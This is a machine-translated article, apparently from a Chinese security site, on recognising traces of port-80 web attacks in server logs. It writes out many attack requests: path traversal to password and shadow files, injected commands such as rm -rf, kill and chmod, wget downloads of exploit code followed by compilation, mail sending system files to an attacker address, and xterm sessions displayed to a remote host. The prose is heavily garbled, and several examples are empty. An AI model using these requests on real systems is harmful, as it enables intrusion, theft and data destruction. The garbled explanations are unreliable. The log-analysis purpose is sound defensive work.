80 port web service attack marks
Source: China Staff League
[Summary]
The WEB site default 80 is the service port, about its various security issues continue to release, some or even the attacker allows the attacker to get the system administrator's permissions into the site, the following is the traces of some 80-port attacks Research, and tell you how to find problems from logging.
[Detailed Description]
The following sections show the general attacks of the web server and the applications on the web server, and the traces left, these lays are merely representative, and there is no list of all attack forms. Each attack is described in detail, and how it uses these vulnerabilities to attack.
(1) "" "" "" "" and "..." request
These attack marks are very common for web applications and web servers, which are used to allow an attacker or a worm program to change the path to the web server to get an unusfained area. Most CGI program vulnerabilities contain these ".." requests.
EXAMPLE:
http://host/cgi-bin/lame.cgi? file = .. / .. / .. / .. / etc / motord
This list shows the attacker requests MOSD file. If an attacker has the ability to break through the root directory of the web server, then more information can be obtained and privileged.
(2) "% 20" request
% 20 is a 16-way value representing spaces, although this does not mean what you can use, but when you browse the log, you will find it, this character may be valid in some applications running on the web server. So, you should look carefully. On the other hand, this request can sometimes help do some commands.
EXAMPLE:
http://host/cgi-bin/lame.cgi? Page = LS% 20-AL│
This List showed an attacker to execute a UNIX command, listing the request for the entire directory, causing an attacker to access important files in your system to help him further obtain privilege conditions.
(3) "% 00" request
% 00 represents a 16-based empty byte, he can be used to fool web applications and request different types of files.
EXAMPLES:
http://host/cgi-bin/lame.cgi? Page = Index.html
This may be a valid request on this machine. If the attacker notes the request movement, he will find the problem of this CGI program.
http://host/cgi-bin/lame.cgi? Page = .. / .. / .. / .. / etc / motd
Perhaps this CGI program does not accept this request because it is to check the suffix name of this request file, such as html.shtml or other type of file. Most programs will tell you that the file type requested is invalid. At this time it will tell the attacker's request to be a file type of a character suffix, so that the attacker can get the path of the system, the file name, leading to Your system gets more sensitive information
Http://host/cgi-bin/lame.cgi? Page = .. / .. / .. /. / etc / motd% 00HTML
Note this request, it will defraud the CGI program to think that this file is a certain acceptable file type, some applications are a commonly used method for attackers due to stupid checkup.
(4) "│" request
This is a pipe character, in the UNIX system to help help multiple system commands simultaneously in a request.
EXAMPLE:
# Cat Access_log│Grep -i ".." (this command will display ".." request in the log, often used to discover attackers and worm attacks)
You can often see that there are many web applications with this character, which also leads to an incorrect alarm in the IDS log.
In your program carefully check, this is good, which can reduce the wrong alert in the intrusion detection system.
Some Listings are given below:
Http://host/cgi-bin/lame.cgi? Page = .. / .. / .. / .. / bin / ls
This request command is executed, below is some changing list
http://host/cgi-bin/lame.cgi? Page = .. / .. / .. / .. / bin / ls% 20-AL% 20 / ETC│
This request lists all files in the / etc directory in the UNIX system
http://host/cgi-bin/lame.cgi? Page = CAT% 20ACCESS_LOG│GREP% 20-I% 20 "Lame"
The execution of this request CAT command and the grep command will also be executed, and "Lame"
(5) ";" request
In UNIX systems, this character allows multiple commands to execute in one line.
EXAMPLE:
# id; uname -a
(After executing the id command, follow the execution uname command)
Some web programs use this character that may result in alert in your IDS log, you should carefully check your web program, which makes your IDS alert failure.
(6) "<" and ">" request
You should check these two characters in your logging, in many reasons, the primary one is this character indicating that adding data in the file.
EXAMPLE 1:
# echo "Your Hax0red H0 H0" >> / etc / motd (request write information in mott file)
An attacker can easily tamper with this asking for your web page. For example, the famous RDS Exploit is often used by an attacker to change the web main page.
EXAMPLE 2:
http://host/something.php= hi% 20MOM% 20IM% 20Bold!
You will notice the html language sign, he also uses "<", ">" characters, this attack cannot cause an attacker to access the system, it confuses that this is a legal information in the Web site (cause When visiting the address of the attacker when visiting this connection, this request may be converted into a 16-en-encoded character form, so that the traces of the attack are not so obvious)
(7) "!" Request
This character requests a common language to attack SS (Server Side Include) i, if the attacker confuses the user clicks the link to be set by the attacker, and the same.
EXAMPLE:
http://host1/something.php=
This list is an attacker may do, which makes the file on a Host2 site look from Host1 (of course, the visitor needs to access the attacker settings. This request may be converted into 16 Encourage coding camouflage, not easy to discover)
At the same time, this way can also be executed with the permissions of the Web site
EXAMPLE:
http://host/something.php= This list is executed on the remote system, which will display this web site User ID, usually "Nobody" or "WWW"
This form also allows you to include hidden files.
EXAMPLE:
http://host/something.php=
This hidden file .htpasswd will not be displayed, the rules established by Apache will reject this .ht formal request, and the SSI flag will bypass this limit and lead to security issues
(8) "
This attack is used to insert a PHP program in a remote web application, which may allow commands, depending on the server settings, and other factors such as PHP settings to security mode)
EXAMPLE:
http://host/something.php=
In some simple PHP applications, it may execute local commands on the remote system with Web site users.
(9) "` "request
This character is often used in Perl executing commands, which is not often used in the web application, so if it sees it in your log, it should be very careful.
EXAMPLE:
http:// host / something.cgi = `ID`
A PERL writes a problematic CGI program that causes the ID command
[Further]
The following section will discuss how many attackers may perform, along with the requested file, and if you have a defect in the command, you should find it. This part just gives you a good idea and tells you what happens, an attacker tries to attack your system's traces, but does not list the commands and requests for all attackers.
"/ bin / ls"
This command requests the entire path, which has this vulnerability in many web applications. If you see this request in many places in the log, a lot of possibilities are the remote execution command vulnerability, but it is not necessarily a problem. It may also be a wrong alert. Once again, write a good Web application (CGI, ASP, PHP ... etc) is the basis of security
EXAMPLE:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. /. / bin / ls% 20-al│
Http://host/cgi-bin/bad.cgi? DOH = LS% 20-Al;
"cmd.exe"
This is a Windows shell, an attacker access and runs this script, can do anything on the Windows machine under the server settings, and many worms are transmitted to the remote machine through the 80-port.
http://host/scripts/something.asp=../../winnt/system32/cmd.exe? DIR E:
"/ bin / id"
This is a 2-way file, which is the same as / bin / ls. If you see this request in many places in the log, great possibility is that there is a remote execution command vulnerability, but it is not necessarily a problem. It may also be a wrong alert.
Which user belongs to which user belongs to?
EXAMPLE:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / id9ttp: //host/cgi-bin/bad.cgi? doh = ID;
"/ bin / rm"
This command can delete files, if incorrect use is very dangerous
EXAMPLES:
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / rm% 20-RF% 20 * │
http://host/cgi-bin/bad.cgi? doh = rm% 20-RF% 20 *;
"wget and tftp" command
These commands often have been used by an attacker to download files that may further obtain privileges. Wget is a command under UNIX, which may be used to download the backdoor program, TFTP is a command under UNIX and NT to download files. Some IIS worms are copied by TFTP to directly spread viruses to other hosts.
EXAMPLES:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / path / to-wget / wget% 20http: //host2/phantasmp.c│
Http://host/cgi-bin/bad.cgi? doh = wget% 20Http: //www.hwa-security.net/phantasmp.c;
"cat" command
This command is used to view file content, often used to read important information, such as profile, password file, credit card file, and file you can think of
EXAMPLES:
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / CAT% 20 / etc / motd│
HTTP: //HOST/CGI-BIN/BAD.CGI? DOH = CAT% 20 / etc / motord;
"echo" command
This command is often used in writing data to the file, such as "index.html"
EXAMPLES:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / echo% 20 "FC- # kiwis% 20WAS% 20HERE"% 20 >>% 200DAY. TXT│
http://host/cgi-bin/bad.cgi? doh = echo% 20 "FC- # kiwis% 20WAS% 20HERE"% 20 >>% 200DAY.TXT;
"ps" command
List the current running process, telling the attacker remote host running those software to get some security issues, get further permissions
EXAMPLES:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / ps% 20-aux
Http://host/cgi-bin/bad.cgi? doh = ps% 20-AUX;
"Kill and Killall" command
In the UNIX system, this command is used to kill the process, and an attacker can use this command to stop the system service and programs, and you can wipe off the traces of the attacker. Some Exploit will generate a lot of child processes.
EXAMPLES:
http://host/cgi-bin/bad.cgi? doh = .. / bin / kill% 20-9% 200│
Http://host/cgi-bin/bad.cgi? doh = kill% 20-9% 200;
"uname" command
This command tells the attacker's name, some times, know which ISP is located through this command, perhaps the attacker has visited today. Usually uname -a to request, these will be recorded in the log file
Examples: http://host/cgi-bin/bad.cgi? Doh = .. / .. / .. / .. / bin / uname% 20-A│
http://host/cgi-bin/bad.cgi? doh = uname% 20-a;
Compilation / interpretation command "CC, GCC, Perl, Python, etc ..."
The attacker downloads Exploit through WGET or TFTP, and compiles the compiler such as CC and GCC to compile the executable, further privileges
EXAMPLES:
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / cc% 20Phantasmp.c│
http://host/cgi-bin/bad.cgi? doh = GCC% 20Phantasmp.c; ./a.out -p 31337;
If you find a "Perl" Python "in the log, you may download the remote Perl, Python script, and try to get privileges locally.
"Mail" command
An attacker usually uses this command to send some important files of the system to the attacker's own mailbox, and can also be an attack of the mail bomb.
EXAMPLES:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin/mail attacker@fuckcnhonker.org <<% 20 / etc / motd│
Http://host/cgi-bin/bad.cgi? doh=mail steele@jersey.whitehouse.gov << /TMP/WU-2.6.1.c;
"XTERM / Other X Application" command
XTERM is often used to get the shell on the remote machine. If you discover these symbols in your log, you must carefully analyze your system and may already have a safe crack. Note that "% 20-Display% 20" characters are found in the log, which is usually started to start XTERM or X applications on the remote machine.
EXAMPLES:
Http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / usr / x11r6 / bin / xterm% 20-Display% 20192.168.22.1│
Http://host/cgi-bin/bad.cgi? doh = xeyes% 20-Display% 20192.168.22.1;
"Chown, Chmod, ChGRP, Chsh, etc ..." and other orders
These commands allow for changing files permitted permission limit in UNIX systems
Chown = Allows Settings of the owner of the file CHMOD = permission to set the license permission CHGRP = Allow Group's ownership of the group for the file CHSH = Allow the user's shell
EXAMPLES:
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / chmod% 20777% 20INDEX.html│
http://host/cgi-bin/bad.cgi? doh = chmod% 20777% 20INDEX.HTML;
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / chown% 20zeno% 20 / etc / master.passwd│
Http://host/cgi-bin/bad.cgi? doh = chsh% 20 / bin / sh;
http://host/cgi-bin/bad.cgi? doh = .. / .. / .. / .. / bin / chGRP% 20NObody% 20 / etc / shadow│
"/ etc / passwd" file
This is the system's password file, which is generally shadow, and does not allow the encrypted password, but the attacker can know that those that are valid users, and the absolute path of the system, the site name and other information, because of usually Over Shadow, so for attackers, usually view / etc / shadow file "/etc/master.passwd"
This file is the password file of the BSD system, which contains an encrypted password. This file is just read-only on the root account, and some unskilled attackers will open the content inside him attempt to read., If the Web site is ROOT privileges, then you can read the contents of the attacker, which will follow the system administrators.
"/ etc / shadow"
Contains the encrypted system password, which is also read only to the root account, and /et/master.passwd is almost
"/ etc / motd"
When the user logs in to the Unix system, in this "Message of the Day" file, it provides important system information and administrators to some settings for users, those who want users to see, those are not, With systematic version information, attackers typically view this file, what system is running, for attackers, the next step is to search for this type of system of EXPLOIT, further system privileges
"/ etc / hosts"
This file provides IP addresses and network information, and attackers can learn more about network settings in the system.
"/usr/local/apache/conf/httpd.conf"
This is the configuration file of an Apache web server, and an attacker can understand if information such as CGI, SSI is accessible.
"/etc/inetd.conf"
This is the profile of the inetd service. If an attacker can understand those services on the remote machine, whether to use Wrapper to access control, if the Wrapper is run, the attacker will check "/etc/hosts.allow" and "/etc/hosts.allow" and " /etc/hosts.deny, file, and may change some settings in the inside, get privileges
".htpasswd, .htaccess, and .htgroup"
These files typically be used to authenticate the user identity, and the attacker will view these files, and get the username and password, password file .htpasswd is encrypted, decrypt by some simple crack programs, so that the attacker access site The protected area (usually the user uses the same password as the user name, so that the attacker can access other accounts)
"access_log and error_log"
These are the log record files of the Apache server, and the attacker often views these files to see those requests record, those who have different requests.
Typically, an attacker will modify these log files, such as his own address information, an attacker breaks through your system through the 80-port, and your system does not have backup work, and there is no other recorder record system status, which will make Very difficult intrusion detection
"[Drive-Letter]: Winntrepairsam._ or [Drive-Letter]: Winntrepairsam"
Password file in the Windows NT system, if the remote command cannot be executed, usually the attacker will request these files, and then crack the password crack tool with the "L0PHT CRACK", if the attacker tries to attack the Administrator's password file, if successful Then the remote machine will be controlled by the attacker [overflow analysis]
I won't say much about overflowing topics in this article, I will mention those places and traces worth noting and special attention, and buffer attacks are often not easy to discover by the attackers through coded conversions and other ways.
Here is a simple list
EXAMPLE:
http: // host / cgi-bin / helloworld type = AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA?
This list shows an attacker to send a lot of A characters to an application to test the buffer overflow of the program. The buffer can obtain the command execution permission of the remote host. If it is a program with the setuid and the owner, through overflow, You can get access to the entire system. If it is not a program, the overflow is just a user permission to run the web site.
Here is all the cases, but you should check your log files, if you suddenly discover a lot of requests that day, the usual request is not much, then you are suffering from overflow attacks, of course it may be A new network worm attack
[Code Conversion]
All attack requests mentioned above, an attacker usually knows that the IDS system is often mechanically checking these requests, usually the attacker will convert the requested content into a 16-en-generated format using the encoded conversion tool, causing IDS to ignore these requests. Our well-known CGI vulnerability scan tool whisker is a very good list. If you find a lot of 16 credits and uncommon characters while viewing the log, you may try to attack your system with some ways.
A quick discovery method is to copy the 16 binding requests in your log file to your browser, can translate into the correct request via the browser, and display the content requested, if you don't Dare to take this danger, simple Man ASCII, you can provide you with the correct encoding.
